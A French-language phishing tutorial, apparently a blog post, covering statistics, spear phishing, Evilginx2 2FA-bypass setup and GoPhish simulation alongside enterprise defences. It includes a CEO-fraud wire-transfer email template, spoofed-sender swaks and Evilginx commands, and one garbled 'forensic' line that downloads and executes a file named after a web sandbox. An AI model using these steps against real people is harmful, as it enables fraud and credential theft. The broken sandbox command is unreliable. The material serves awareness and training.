🎣 Phishing Masterclass : Anatomie d'une Cybermenace

🎯 Le phishing, c’est l’art de piéger les humains – et voici comment le maîtriser ou s’en protéger

Plongée technique dans l’ingénierie sociale, l’exploitation des failles humaines et les contre-mesures enterprise. Depuis Kali Linux, on va décortiquer les attaques, les simuler, et les contrer comme des pros.

1️⃣ Épidémiologie du Phishing : Statistiques et Impact Business

🔍 Chiffres Clés 2023 (Verizon DBIR, IBM X-Force)

  • ⏱️ 1 attaque toutes les 11 secondes – Coût moyen : $4.9M
  • 📈 +65% sur les SaaS (Microsoft 365, Google Workspace)
  • 🎯 73% des ransomwares via phishing

🧠 Psychologie de la Manipulation (Cialdini Inside)

2️⃣ Typologie des Attaques : Du Spray-and-Pray au Spear Phishing

🎯 2.1. Spear Phishing (Ciblage Entreprise)

Exemple : Email spoofé au CFO :

From: "CEO Name"   # Spoof via Kali
Subject: Transfert urgent - Acquisition
"Bonjour [Prénom], réunion en cours, virement urgent 450k€ vers IBAN FR76..., confirmez sous 1h."
                

🔍 Technique sous Kali :

# OSINT avec theHarvester
theHarvester -d company.com -b linkedin -f result.html
# Envoi via swaks
swaks --to cfo@company.com --from ceo@company.com --server smtp.company.com --body "virement.txt"
                

🔗 2.2. Chain-Based Phishing

🌐 2.3. Evilginx MITM Avancé

Bypass 2FA avec Evilginx sous Kali :

# Installation
git clone https://github.com/kgretzky/evilginx2
cd evilginx2 && sudo python3 setup.py install
# Configuration
evilginx2
phishlet hostname o365 'login.microsoftonline.com'
lures create o365
                

→ Capture des tokens même avec 2FA.

📊 Tableau Récapitulatif

Type Difficulté Outils Cibles
Spray-and-Pray Facile SMTP massif, SET Grand public
Spear Phishing Moyen theHarvester, swaks Cadres, employés spécifiques
Evilginx MITM Avancé Evilginx2, DNS spoofing Utilisateurs SaaS

3️⃣ Techniques Offensives : Au-Delà du Clonage Basique

📧 3.1. Bypass des Filtres Email

🤖 3.2. Phishing par IA Générative

4️⃣ Cyberdéfense Enterprise : Stratégies en Profondeur

🛡️ 4.1. Stack Technologique

  • 🔗 Email : Mimecast + Proofpoint
  • 🌐 Web : Zscaler
  • 🔐 Auth : FIDO2

🕵️ 4.2. Analyse Forensique

  1. Vérifier en-têtes :
    cat phishing.eml | grep "Received"
  2. Extraire URLs :
    strings phishing.eml | grep -i http
  3. Sandbox :
    wget any.run && chmod +x any.run && ./any.run phishing.eml

6️⃣ Lab : Simulation avec GoPhish

# Installation sous Kali
sudo apt update && sudo apt install gophish
# Lancement
gophish -http :80 -admin :3333
# Config via navigateur : https://localhost:3333
            

📈 Metrics : Taux d’ouverture, clics, heatmaps

Ressources Recommandées :

  • 📚 "Phishing Dark Waters" – Hadnagy
  • 🔗 eCXD (eLearnSecurity)
  • 🛠️ MITRE ATT&CK (T1566)